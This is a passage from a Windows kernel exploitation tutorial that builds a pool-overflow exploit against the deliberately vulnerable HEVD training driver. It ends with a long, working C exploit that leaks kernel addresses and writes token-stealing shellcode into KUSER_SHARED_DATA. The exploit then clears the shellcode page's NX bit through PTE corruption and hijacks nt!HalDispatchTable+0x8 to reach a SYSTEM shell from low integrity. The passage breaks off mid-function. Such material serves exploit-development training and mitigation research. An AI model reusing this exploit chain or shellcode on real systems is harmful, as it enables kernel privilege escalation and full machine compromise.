Now, if we were to use the “Set” functionality of HEVD and supply the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object that was corrupted and also used for grooming, at address 0xffff8e03c8d5c2b0, HEVD would take the value stored in Name, dereference it, and overwrite it. This is because HEVD expects Name to be one of the pool allocations previously showcased, whose pointers we do not control. Since we have supplied another address, HEVD will still perform the overwrite, but this time it will overwrite the pointer we supplied, which is another ARW_HELPER_OBJECT_NON_PAGED_POOL_NX. Since the first member of one of these objects is Name, HEVD will actually write whatever we supply into the Name member of our main object! Let’s view this in WinDbg.

As our exploit showcased, we are using HEVD+0x2038 in this case. This value should be written to our main object.

As you can see, our main object now has its Name member pointing to HEVD+0x2038, which is a pointer to the kernel! After running the full exploit, we have now obtained the base address of HEVD from the previous exploit, and now the base of the kernel via an arbitrary read by way of pool overflow - all from low integrity!

The beauty of this technique of leveraging two objects should be clear now - we do not have to constantly perform overflows of objects in order to perform exploitation. We can now just simply use the main object to read!

Our exploitation technique will be to corrupt the page table entry of the memory page our shellcode will eventually reside in. If you are not familiar with this technique, I have two blogs written on the subject, plus one about memory paging. You can find them here: one, two, and three.

For our purposes, we will need to arbitrarily read the following items:

  1. nt!MiGetPteAddress+0x13 - this contains the base of the PTEs needed for calculations
  2. PTE bits that make up the shellcode page
  3. [nt!HalDispatchTable+0x8] - used to execute our shellcode. We first need to preserve this address by reading it to ensure exploit stability

Let’s add a routine to address the first issue, reading the base of the page table entries. We can calculate the offset to the function MiGetPteAddress+0x13 and then use our arbitrary read primitive.

Leveraging the exact same method as before, we can see we have defeated page table randomization and have the base of the page table entries in hand!

The next step is to obtain the PTE bits that make up the shellcode page. We will eventually write our shellcode to KUSER_SHARED_DATA+0x800 in kernel mode, which is at a static address of 0xfffff78000000800. We can instrument the routine to obtain this information in C.
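
The missing piece is the PTE’s virtual address, which is derived from the leaked PTE base with the usual shift-and-mask arithmetic (the same calculation used later in the final exploit; pteBase is the value read from nt!MiGetPteAddress+0x13):

// Compute the PTE virtual address for the shellcode page
unsigned long long shellcodePage = 0xfffff78000000800;                     // KUSER_SHARED_DATA+0x800
unsigned long long shellcodePte  = ((shellcodePage >> 9) & 0x7FFFFFFFF8) + pteBase;
// The arbitrary read primitive is then pointed at shellcodePte to leak the PTE contents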

After running the updated exploit, we can see that we are able to leak the PTE bits for KUSER_SHARED_DATA+0x800, where our shellcode will eventually reside.

Note that the !pte extension in WinDbg was giving me trouble, so, from the debuggee machine, I ran WinDbg “classic” with local kernel debugging (lkd) to show the output of !pte. Notice that the actual virtual address of the PTE has changed, but the PTE contents are the same. This is because I rebooted the machine and kASLR kicked in; the WinDbg “classic” screenshot is only meant to show the PTE contents.

You can view this previous blog of mine to understand the permissions KUSER_SHARED_DATA has, which are write but not execute. The last item we need is the contents of [nt!HalDispatchTable+0x8].

After executing the updated code, we can see we have preserved the value [nt!HalDispatchTable+0x8].

The last item on the agenda is the write primitive, which is 99 percent identical to the read primitive. After writing our shellcode to kernel mode and then corrupting the PTE of the shellcode page, we will be able to successfully escalate our privileges.

Arbitrary Write Primitive

Leveraging the same concepts from the arbitrary read primitive, we can also arbitrarily overwrite 64-bit pointers! Instead of using the “Get” operation to fetch the dereferenced contents of the Name value held by the “corrupted” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object and return them into the Name value specified by the “main” object, this time we set the Name value of the “main” object not to a pointer that receives the contents, but to the value we want written to memory. In this case, we set this value to each QWORD of our shellcode, and we set the Name value of the “corrupted” object to KUSER_SHARED_DATA+0x800, incrementing it as we go.
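
In code, the write primitive is the mirror image of the read primitive sketched earlier, using the “Set” IOCTL (0x00222067) twice (again a sketch that assumes the corrupted object’s index and the main object are in scope, as they are in readwritePrimitive()):

// Arbitrary write: writes the QWORD 'what' to the kernel address 'where'
void writeQword(HANDLE driverHandle, unsigned long long where, unsigned long long what)
{
    DWORD bytesReturned;

    // "Set" on the corrupted object points the main object's Name member at 'where'
    helperobjectArray[index].Name = &where;
    DeviceIoControl(driverHandle, 0x00222067, &helperobjectArray[index],
        sizeof(helperobjectArray[index]), NULL, 0, &bytesReturned, NULL);

    // "Set" on the main object then writes 'what' to the address Name now points to
    mainObject.Name = &what;
    DeviceIoControl(driverHandle, 0x00222067, &mainObject, sizeof(mainObject),
        NULL, 0, &bytesReturned, NULL);
}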

From here we can run our updated exploit. Since we have created a loop to automate the writing process, we can see we are able to arbitrarily write the contents of the 9 QWORDS which make up our shellcode to KUSER_SHARED_DATA+0x800!

Awesome! We have now successfully performed the arbitrary write primitive! The next goal is to corrupt the contents of the PTE for the KUSER_SHARED_DATA+0x800 page.

From here we can use WinDbg classic to inspect the PTE before and after the write operation.

Awesome! Our exploit now just needs three more things:

  1. Corrupt [nt!HalDispatchTable+0x8] to point to KUSER_SHARED_DATA+0x800
  2. Invoke ntdll!NtQueryIntervalProfile, which will perform the transition to kernel mode and invoke [nt!HalDispatchTable+0x8], thus executing our shellcode
  3. Restore [nt!HalDispatchTable+0x8] with the arbitrary write primitive

Let’s update our exploit code to perform step one.

After executing the updated code, we can see that we have successfully overwritten nt!HalDispatchTable+0x8 with the address of KUSER_SHARED_DATA+0x800 - which contains our shellcode!

Next, we can add the routine to dynamically resolve ntdll!NtQueryIntervalProfile, invoke it, and then restore [nt!HalDispatchTable+0x8].
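
That routine boils down to resolving the stub from ntdll at runtime and calling it with an unused profile source, which sends execution down the kernel path that calls through [nt!HalDispatchTable+0x8] (a sketch of what appears in the final code at the end of this post):

// Resolve and call ntdll!NtQueryIntervalProfile to reach [nt!HalDispatchTable+0x8]
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(ULONG ProfileSource, PULONG Interval);

NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(
    GetModuleHandle(TEXT("ntdll.dll")), "NtQueryIntervalProfile");

ULONG interval = 0;
NtQueryIntervalProfile(0x1234, &interval);   // kernel mode eventually invokes [nt!HalDispatchTable+0x8]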

The final result is a SYSTEM shell from low integrity!

“…Unless We Conquer, As Conquer We Must, As Conquer We Shall.”

Hopefully you, as the reader, found this two-part series on pool corruption useful! As mentioned at the beginning of this post, we must expect mitigations such as VBS and HVCI to be enabled in the future. ROP is still a viable alternative in the kernel due to the lack of kernel CET (kCET) at the moment (although I am sure this is subject to change). As such, techniques such as the one outlined in this blog post will soon be deprecated, leaving us with fewer options for exploitation than we started with. Data-only attacks are always viable, and there have been more novel techniques mentioned, such as this tweet sent to me by Dmytro, which talks about leveraging ROP to forge kernel function calls even with VBS/HVCI enabled. As the title of this last section of the blog articulates, where there is a will there is a way - and although the bar will be raised, this is only par for the course with exploit development over the past few years. KPP + VBS + HVCI + kCFG/kXFG + SMEP + DEP + kASLR + kCET and many other mitigations will prove very useful for blocking most exploits. I hope that researchers stay hungry and continue to push the limits of these mitigations to find more novel ways to keep exploit development alive!

Peace, love, and positivity :-).

Here is the final exploit code, which is also available on my GitHub:

// HackSysExtreme Vulnerable Driver: Pool Overflow + Memory Disclosure
// Author: Connor McGarr (@33y0re)

#include <windows.h>
#include <stdio.h>

// typdef an ARW_HELPER_OBJECT_IO struct
typedef struct _ARW_HELPER_OBJECT_IO
{
    PVOID HelperObjectAddress;
    PVOID Name;
    SIZE_T Length;
} ARW_HELPER_OBJECT_IO, * PARW_HELPER_OBJECT_IO;

// Create a global array of ARW_HELPER_OBJECT_IO objects to manage the groomed pool allocations
ARW_HELPER_OBJECT_IO helperobjectArray[5000] = { 0 };

// Prepping call to nt!NtQueryIntervalProfile
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);

// Leak the base of HEVD.sys
unsigned long long memLeak(HANDLE driverHandle)
{
    // Array to manage handles opened by CreateEventA
    HANDLE eventObjects[5000];

    // Spray 5000 objects to fill the new page
    for (int i = 0; i < 5000; i++)
    {
        // Create the objects
        HANDLE tempHandle = CreateEventA(
            NULL,
            FALSE,
            FALSE,
            NULL
        );

        // Assign the handles to the array
        eventObjects[i] = tempHandle;
    }

    // Check to see if the first handle is a valid handle
    if (eventObjects[0] == NULL)
    {
        printf("[-] Error! Unable to spray CreateEventA objects! Error: 0x%lx\n", GetLastError());

        return 0x1;
        exit(-1);
    }
    else
    {
        printf("[+] Sprayed CreateEventA objects to fill holes of size 0x80!\n");

        // Close half of the handles
        for (int i = 0; i < 5000; i += 2)
        {
            BOOL tempHandle1 = CloseHandle(
                eventObjects[i]
            );

            eventObjects[i] = NULL;

            // Error handling
            if (!tempHandle1)
            {
                printf("[-] Error! Unable to free the CreateEventA objects! Error: 0x%lx\n", GetLastError());

                return 0x1;
                exit(-1);
            }
        }

        printf("[+] Poked holes in the new pool page!\n");

        // Allocate UaF Objects in place of the poked holes by just invoking the IOCTL, which will call ExAllocatePoolWithTag for a UAF object
        // kLFH should automatically fill the freed holes with the UAF objects
        DWORD bytesReturned;

        for (int i = 0; i < 2500; i++)
        {
            DeviceIoControl(
                driverHandle,
                0x00222053,
                NULL,
                0,
                NULL,
                0,
                &bytesReturned,
                NULL
            );
        }

        printf("[+] Allocated objects containing a pointer to HEVD in place of the freed CreateEventA objects!\n");

        // Close the rest of the event objects
        for (int i = 1; i <= 5000; i += 2)
        {
            BOOL tempHandle2 = CloseHandle(
                eventObjects[i]
            );

            eventObjects[i] = NULL;

            // Error handling
            if (!tempHandle2)
            {
                printf("[-] Error! Unable to free the rest of the CreateEventA objects! Error: 0x%lx\n", GetLastError());

                return 0x1;
                exit(-1);
            }
        }

        // Array to store the buffer (output buffer for DeviceIoControl) and the base address
        unsigned long long outputBuffer[100];
        unsigned long long hevdBase = 0;

        // Everything is now, theoretically, [FREE, UAFOBJ, FREE, UAFOBJ, FREE, UAFOBJ], barring any more randomization from the kLFH
        // Fill some of the holes, but not all, with vulnerable chunks that can read out-of-bounds (we don't want to fill up all the way to avoid reading from a page that isn't mapped)

        for (int i = 0; i <= 100; i++)
        {
            // Return buffer
            DWORD bytesReturned1;

            DeviceIoControl(
                driverHandle,
                0x0022204f,
                NULL,
                0,
                &outputBuffer,
                sizeof(outputBuffer),
                &bytesReturned1,
                NULL
            );

        }

        printf("[+] Successfully triggered the out-of-bounds read!\n");

        // Parse the output
        for (int i = 0; i < 100; i++)
        {
            // Kernel mode address?
            if ((outputBuffer[i] & 0xfffff00000000000) == 0xfffff00000000000)
            {
                printf("[+] Address of function pointer in HEVD.sys: 0x%llx\n", outputBuffer[i]);
                printf("[+] Base address of HEVD.sys: 0x%llx\n", outputBuffer[i] - 0x880CC);

                // Store the variable for future usage
                hevdBase = outputBuffer[i] - 0x880CC;

                // Return the value of the base of HEVD
                return hevdBase;
            }
        }
    }

    return 0x0; // fall-through: no kernel-mode pointer was found
}

// Function used to fill the holes in pool pages
void fillHoles(HANDLE driverHandle)
{
    // Instantiate an ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO tempObject = { 0 };

    // Value to assign the Name member of each ARW_HELPER_OBJECT_IO
    unsigned long long nameValue = 0x9090909090909090;

    // Set the length to 0x8 so that the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object allocated in the pool has its Name member allocated to size 0x8, a 64-bit pointer size
    tempObject.Length = 0x8;

    // Bytes returned
    DWORD bytesreturnedFill;

    for (int i = 0; i < 5000; i++)
    {
        // Set the Name value to 0x9090909090909090
        tempObject.Name = &nameValue;

        // Allocate a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a Name member of size 0x8 and a Name value of 0x9090909090909090
        DeviceIoControl(
            driverHandle,
            0x00222063,
            &tempObject,
            sizeof(tempObject),
            &tempObject,
            sizeof(tempObject),
            &bytesreturnedFill,
            NULL
        );

        // Using non-controlled arbitrary write to set the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object to 0x9090909090909090 via the Name member of each ARW_HELPER_OBJECT_IO
        // This will be used later on to filter out which ARW_HELPER_OBJECT_NON_PAGED_POOL_NX HAVE NOT been corrupted successfully (e.g. their Name member is 0x9090909090909090 still)
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &tempObject,
            sizeof(tempObject),
            &tempObject,
            sizeof(tempObject),
            &bytesreturnedFill,
            NULL
        );

        // After allocating the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects (via the ARW_HELPER_OBJECT_IO objects), assign each ARW_HELPER_OBJECT_IO structures to the global managing array
        helperobjectArray[i] = tempObject;
    }

    printf("[+] Sprayed ARW_HELPER_OBJECT_IO objects to fill holes in the NonPagedPoolNx with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");
}

// Fill up the new page within the NonPagedPoolNx with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects
void groomPool(HANDLE driverHandle)
{
    // Instantiate an ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO tempObject1 = { 0 };

    // Value to assign the Name member of each ARW_HELPER_OBJECT_IO
    unsigned long long nameValue1 = 0x9090909090909090;

    // Set the length to 0x8 so that the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object allocated in the pool has its Name member allocated to size 0x8, a 64-bit pointer size
    tempObject1.Length = 0x8;

    // Bytes returned
    DWORD bytesreturnedGroom;

    for (int i = 0; i < 5000; i++)
    {
        // Set the Name value to 0x9090909090909090
        tempObject1.Name = &nameValue1;

        // Allocate a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a Name member of size 0x8 and a Name value of 0x9090909090909090
        DeviceIoControl(
            driverHandle,
            0x00222063,
            &tempObject1,
            sizeof(tempObject1),
            &tempObject1,
            sizeof(tempObject1),
            &bytesreturnedGroom,
            NULL
        );

        // Using non-controlled arbitrary write to set the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object to 0x9090909090909090 via the Name member of each ARW_HELPER_OBJECT_IO
        // This will be used later on to filter out which ARW_HELPER_OBJECT_NON_PAGED_POOL_NX HAVE NOT been corrupted successfully (e.g. their Name member is 0x9090909090909090 still)
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &tempObject1,
            sizeof(tempObject1),
            &tempObject1,
            sizeof(tempObject1),
            &bytesreturnedGroom,
            NULL
        );

        // After allocating the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects (via the ARW_HELPER_OBJECT_IO objects), assign each ARW_HELPER_OBJECT_IO structures to the global managing array
        helperobjectArray[i] = tempObject1;
    }

    printf("[+] Filled the new page with ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");
}

// Free every other object in the global array to poke holes for the vulnerable objects
void pokeHoles(HANDLE driverHandle)
{
    // Bytes returned
    DWORD bytesreturnedPoke;

    // Free every other element in the global array managing objects in the new page from grooming
    for (int i = 0; i < 5000; i += 2)
    {
        DeviceIoControl(
            driverHandle,
            0x0022206f,
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &bytesreturnedPoke,
            NULL
        );
    }

    printf("[+] Poked holes in the NonPagedPoolNx page containing the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects!\n");
}

// Create the main ARW_HELPER_OBJECT_IO
ARW_HELPER_OBJECT_IO createmainObject(HANDLE driverHandle)
{
    // Instantiate an object of type ARW_HELPER_OBJECT_IO
    ARW_HELPER_OBJECT_IO helperObject = { 0 };

    // Set the Length member which corresponds to the amount of memory used to allocate a chunk to store the Name member eventually
    helperObject.Length = 0x8;

    // Bytes returned
    DWORD bytesReturned2;

    // Invoke CreateArbitraryReadWriteHelperObjectNonPagedPoolNx to create the main ARW_HELPER_OBJECT_NON_PAGED_POOL_NX
    DeviceIoControl(
        driverHandle,
        0x00222063,
        &helperObject,
        sizeof(helperObject),
        &helperObject,
        sizeof(helperObject),
        &bytesReturned2,
        NULL
    );

    // Parse the output
    printf("[+] PARW_HELPER_OBJECT_IO->HelperObjectAddress: 0x%p\n", helperObject.HelperObjectAddress);
    printf("[+] PARW_HELPER_OBJECT_IO->Name: 0x%p\n", helperObject.Name);
    printf("[+] PARW_HELPER_OBJECT_IO->Length: 0x%zu\n", helperObject.Length);

    return helperObject;
}

// Read/write primitive
void readwritePrimitive(HANDLE driverHandle)
{
    // Store the value of the base of HEVD
    unsigned long long hevdBase = memLeak(driverHandle);

    // Store the main ARW_HELOPER_OBJECT
    ARW_HELPER_OBJECT_IO mainObject = createmainObject(driverHandle);

    // Fill the holes
    fillHoles(driverHandle);

    // Groom the pool
    groomPool(driverHandle);

    // Poke holes
    pokeHoles(driverHandle);

    // Use buffer overflow to take "main" ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object's Name value (managed by ARW_HELPER_OBJECT_IO.Name) to overwrite any of the groomed ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name values
    // Create a buffer that first fills up the vulnerable chunk of 0x10 (16) bytes
    unsigned long long vulnBuffer[5];
    vulnBuffer[0] = 0x4141414141414141;
    vulnBuffer[1] = 0x4141414141414141;

    // Hardcode the _POOL_HEADER value for a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object
    vulnBuffer[2] = 0x6b63614802020000;

    // Padding
    vulnBuffer[3] = 0x4141414141414141;

    // Overwrite any of the adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object's Name member with the address of the "main" ARW_HELPER_OBJECT_NON_PAGED_POOL_NX (via ARW_HELPER_OBJECT_IO.HelperObjectAddress)
    vulnBuffer[4] = (unsigned long long)mainObject.HelperObjectAddress;

    // Bytes returned
    DWORD bytesreturnedOverflow;
    DWORD bytesreturnedreadPrimtitve;

    printf("[+] Triggering the out-of-bounds-write via pool overflow!\n");

    // Trigger the pool overflow
    DeviceIoControl(
        driverHandle,
        0x0022204b,
        &vulnBuffer,
        sizeof(vulnBuffer),
        &vulnBuffer,
        0x28,
        &bytesreturnedOverflow,
        NULL
    );

    // Find which "groomed" object was overflowed
    int index = 0;
    unsigned long long placeholder = 0x9090909090909090;

    // Loop through every groomed object to find out which Name member was overwritten with the main ARW_HELPER_NON_PAGED_POOL_NX object
    for (int i = 0; i < 5000; i++)
    {
        // The placeholder variable will be overwritten. Get operation will overwrite this variable with the real contents of each object's Name member
        helperobjectArray[i].Name = &placeholder;

        DeviceIoControl(
            driverHandle,
            0x0022206b,
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &helperobjectArray[i],
            sizeof(helperobjectArray[i]),
            &bytesreturnedreadPrimtitve,
            NULL
        );

        // Loop until a Name value other than the original NOPs is found
        if (placeholder != 0x9090909090909090)
        {
            printf("[+] Found the overflowed object overwritten with main ARW_HELPER_NON_PAGED_POOL_NX object!\n");
            printf("[+] PARW_HELPER_OBJECT_IO->HelperObjectAddress: 0x%p\n", helperobjectArray[i].HelperObjectAddress);

            // Assign the index
            index = i;

            printf("[+] Array index of global array managing groomed objects: %d\n", index);

            // Break the loop
            break;
        }
    }

    // IAT entry from HEVD.sys which points to nt!ExAllocatePoolWithTag
    unsigned long long ntiatLeak = hevdBase + 0x2038;

    // Print update
    printf("[+] Target HEVD.sys address with pointer to ntoskrnl.exe: 0x%llx\n", ntiatLeak);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &ntiatLeak;

    // Set the Name member of the "corrupted" object managed by the global array. The main object is currently set to the Name member of one of the sprayed ARW_HELPER_OBJECT_NON_PAGED_POOL_NX that was corrupted via the pool overflow
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare variable that will receive the address of nt!ExAllocatePoolWithTag and initialize it
    unsigned long long ntPointer = 0x9090909090909090;

    // Setting the Name member of the main object to the address of the ntPointer variable. When the Name member is dereferenced and bubbled back up to user mode, it will overwrite the value of ntPointer
    mainObject.Name = &ntPointer;

    // Perform the "Get" operation on the main object, which should now have the Name member set to the IAT entry from HEVD
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print the pointer to nt!ExAllocatePoolWithTag
    printf("[+] Leaked ntoskrnl.exe pointer! nt!ExAllocatePoolWithTag: 0x%llx\n", ntPointer);

    // Assign a variable the base of the kernel (static offset)
    unsigned long long kernelBase = ntPointer - 0x9b3160;

    // Print the base of the kernel
    printf("[+] ntoskrnl.exe base address: 0x%llx\n", kernelBase);

    // Assign a variable with nt!MiGetPteAddress+0x13
    unsigned long long migetpteAddress = kernelBase + 0x222073;

    // Print update
    printf("[+] nt!MiGetPteAddress+0x13: 0x%llx\n", migetpteAddress);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &migetpteAddress;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the base of the PTEs
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare a variable that will receive the base of the PTEs
    unsigned long long pteBase = 0x9090909090909090;

    // Setting the Name member of the main object to the address of the pteBase variable
    mainObject.Name = &pteBase;

    // Perform the "Get" operation on the main object
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Base of the page table entries: 0x%llx\n", pteBase);

    // Calculate the PTE page for our shellcode in KUSER_SHARED_DATA
    unsigned long long shellcodePte = 0xfffff78000000800 >> 9;
    shellcodePte = shellcodePte & 0x7FFFFFFFF8;
    shellcodePte = shellcodePte + pteBase;

    // Print update
    printf("[+] KUSER_SHARED_DATA+0x800 PTE page: 0x%llx\n", shellcodePte);

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &shellcodePte;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the address of the shellcode PTE page
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare a variable that will receive the PTE bits
    unsigned long long pteBits = 0x9090909090909090;

    // Setting the Name member of the main object
    mainObject.Name = &pteBits;

    // Perform the "Get" operation on the main object
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] PTE bits for shellcode page: %p\n", pteBits);

    // Store nt!HalDispatchTable+0x8
    unsigned long long halTemp = kernelBase + 0xc00a68;

    // Assign the target address to the corrupted object
    helperobjectArray[index].Name = &halTemp;

    // Set the Name member of the "corrupted" object managed by the global array to obtain the pointer at nt!HalDispatchTable+0x8
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Declare a variable that will receive [nt!HalDispatchTable+0x8]
    unsigned long long halDispatch = 0x9090909090909090;

    // Setting the Name member of the main object
    mainObject.Name = &halDispatch;

    // Perform the "Get" operation on the main object
    DeviceIoControl(
        driverHandle,
        0x0022206b,
        &mainObject,
        sizeof(mainObject),
        &mainObject,
        sizeof(mainObject),
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Preserved [nt!HalDispatchTable+0x8] value: 0x%llx\n", halDispatch);

    // Arbitrary write primitive

    /*
        ; Windows 10 19H1 x64 Token Stealing Payload
        ; Author Connor McGarr
        [BITS 64]
        _start:
            mov rax, [gs:0x188]       ; Current thread (_KTHREAD)
            mov rax, [rax + 0xb8]     ; Current process (_EPROCESS)
            mov rbx, rax              ; Copy current process (_EPROCESS) to rbx
        __loop:
            mov rbx, [rbx + 0x448]    ; ActiveProcessLinks
            sub rbx, 0x448            ; Go back to current process (_EPROCESS)
            mov rcx, [rbx + 0x440]    ; UniqueProcessId (PID)
            cmp rcx, 4                ; Compare PID to SYSTEM PID
            jnz __loop                ; Loop until SYSTEM PID is found
            mov rcx, [rbx + 0x4b8]    ; SYSTEM token is @ offset _EPROCESS + 0x4b8
            and cl, 0xf0              ; Clear out _EX_FAST_REF RefCnt
            mov [rax + 0x4b8], rcx    ; Copy SYSTEM token to current process
            xor rax, rax              ; set NTSTATUS STATUS_SUCCESS
            ret                       ; Done!
    */

    // Shellcode
    unsigned long long shellcode[9] = { 0 };
    shellcode[0] = 0x00018825048B4865;
    shellcode[1] = 0x000000B8808B4800;
    shellcode[2] = 0x04489B8B48C38948;
    shellcode[3] = 0x000448EB81480000;
    shellcode[4] = 0x000004408B8B4800;
    shellcode[5] = 0x8B48E57504F98348;
    shellcode[6] = 0xF0E180000004B88B;
    shellcode[7] = 0x48000004B8888948;
    shellcode[8] = 0x0000000000C3C031;

    // Assign the target address to write to the corrupted object
    unsigned long long kusersharedData = 0xfffff78000000800;

    // Create a "counter" for writing the array of shellcode
    int counter = 0;

    // For loop to write the shellcode
    for (int i = 0; i < 9; i++)
    {
        // Setting the corrupted object to KUSER_SHARED_DATA+0x800 incrementally 9 times, since our shellcode is 9 QWORDS
        // kusersharedData variable, managing the current address of KUSER_SHARED_DATA+0x800, is incremented by 0x8 at the end of each iteration of the loop
        helperobjectArray[index].Name = &kusersharedData;

        // Setting the Name member of the main object to specify what we would like to write
        mainObject.Name = &shellcode[counter];

        // Set the Name member of the "corrupted" object managed by the global array to KUSER_SHARED_DATA+0x800, incrementally
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &helperobjectArray[index],
            sizeof(helperobjectArray[index]),
            NULL,
            NULL,
            &bytesreturnedreadPrimtitve,
            NULL
        );

        // Perform the arbitrary write via "set" to overwrite each QWORD of KUSER_SHARED_DATA+0x800 until our shellcode is written
        DeviceIoControl(
            driverHandle,
            0x00222067,
            &mainObject,
            sizeof(mainObject),
            NULL,
            NULL,
            &bytesreturnedreadPrimtitve,
            NULL
        );

        // Increase the counter
        counter++;

        // Move to the next QWORD of KUSER_SHARED_DATA+0x800
        kusersharedData += 0x8;
    }

    // Print update
    printf("[+] Successfully wrote the shellcode to KUSER_SHARED_DATA+0x800!\n");

    // Taint the PTE contents to corrupt the NX bit in KUSER_SHARED_DATA+0x800
    unsigned long long taintedBits = pteBits & 0x0FFFFFFFFFFFFFFF;

    // Print update
    printf("[+] Tainted PTE contents: %p\n", taintedBits);

    // Leverage the arbitrary write primitive to corrupt the PTE contents

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &shellcodePte;

    // Specify what we would like to write (the tainted PTE contents)
    mainObject.Name = &taintedBits;

    // Set the Name member of the "corrupted" object managed by the global array to KUSER_SHARED_DATA+0x800's PTE virtual address
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Perform the arbitrary write
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &mainObject,
        sizeof(mainObject),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Successfully corrupted the PTE of KUSER_SHARED_DATA+0x800! This region should now be marked as RWX!\n");

    // Leverage the arbitrary write primitive to overwrite nt!HalDispatchTable+0x8

    // Reset kusersharedData
    kusersharedData = 0xfffff78000000800;

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &halTemp;

    // Specify where we would like to write (the address of KUSER_SHARED_DATA+0x800)
    mainObject.Name = &kusersharedData;

    // Set the Name member of the "corrupted" object managed by the global array to nt!HalDispatchTable+0x8
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Perform the arbitrary write
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &mainObject,
        sizeof(mainObject),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Successfully corrupted [nt!HalDispatchTable+0x8]!\n");

    // Locating nt!NtQueryIntervalProfile
    NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(
        GetModuleHandle(
            TEXT("ntdll.dll")),
        "NtQueryIntervalProfile"
    );

    // Error handling
    if (!NtQueryIntervalProfile)
    {
        printf("[-] Error! Unable to find ntdll!NtQueryIntervalProfile! Error: %d\n", GetLastError());
        exit(1);
    }

    // Print update for found ntdll!NtQueryIntervalProfile
    printf("[+] Located ntdll!NtQueryIntervalProfile at: 0x%llx\n", NtQueryIntervalProfile);

    // Calling nt!NtQueryIntervalProfile
    ULONG exploit = 0;
    NtQueryIntervalProfile(
        0x1234,
        &exploit
    );

    // Print update
    printf("[+] Successfully executed the shellcode!\n");

    // Leverage arbitrary write for restoration purposes

    // Setting the Name member of the corrupted object to specify where we would like to write
    helperobjectArray[index].Name = &halTemp;

    // Specify where we would like to write (the address of the preserved value at [nt!HalDispatchTable+0x8])
    mainObject.Name = &halDispatch;

    // Set the Name member of the "corrupted" object managed by the global array to nt!HalDispatchTable+0x8
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &helperobjectArray[index],
        sizeof(helperobjectArray[index]),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Perform the arbitrary write
    DeviceIoControl(
        driverHandle,
        0x00222067,
        &mainObject,
        sizeof(mainObject),
        NULL,
        NULL,
        &bytesreturnedreadPrimtitve,
        NULL
    );

    // Print update
    printf("[+] Successfully restored [nt!HalDispatchTable+0x8]!\n");

